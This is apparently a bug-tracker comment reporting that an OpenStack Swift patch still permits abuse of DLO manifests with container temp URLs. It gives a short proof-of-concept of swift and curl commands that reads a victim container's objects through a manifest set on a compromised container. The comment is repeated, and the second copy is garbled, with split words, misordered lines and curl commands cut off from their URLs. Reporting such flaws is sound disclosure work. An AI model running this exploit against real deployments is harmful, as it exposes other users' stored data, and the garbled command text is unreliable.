Looks like the patch is still allowing to abuse DLO+container tempurl, for example using the following simple script:
echo 12345 > foo.txt swift upload victim-container foo.txt swift post -m "temp-url-key: secret" compromised-container
tempurl=`swift-temp-url PUT 60 /v1/AUTH_test/compromised-container/foo.txt secret` curl -i -X PUT http://127.0.0.1:8080${tempurl} -H 'X-Object-Manifest: victim-container/f' -H 'Content-Length: 0'
tempurl=`swift-temp-url GET 60 /v1/AUTH_test/compromised-container/foo.txt secret` curl -i http://127.0.0.1:8080${tempurl}
Or did I get it wrong?
Looks like the patch is still allowing to abuse DLO+container tempurl, for example using the following simple script:
echo 12345 > foo.txt container
swift upload victim-container foo.txt
swift post -m "temp-url-key: secret" compromised-
tempurl= `swift- temp-url PUT 60 /v1/AUTH_ test/compromise d-container/ foo.txt secret` 127.0.0. 1:8080${tempurl} -H 'X-Object-Manifest: victim-container/f' -H 'Content-Length: 0'
curl -i -X PUT http://
tempurl= `swift- temp-url GET 60 /v1/AUTH_ test/compromise d-container/ foo.txt secret` 127.0.0. 1:8080${tempurl}
curl -i http://
Or did I get it wrong?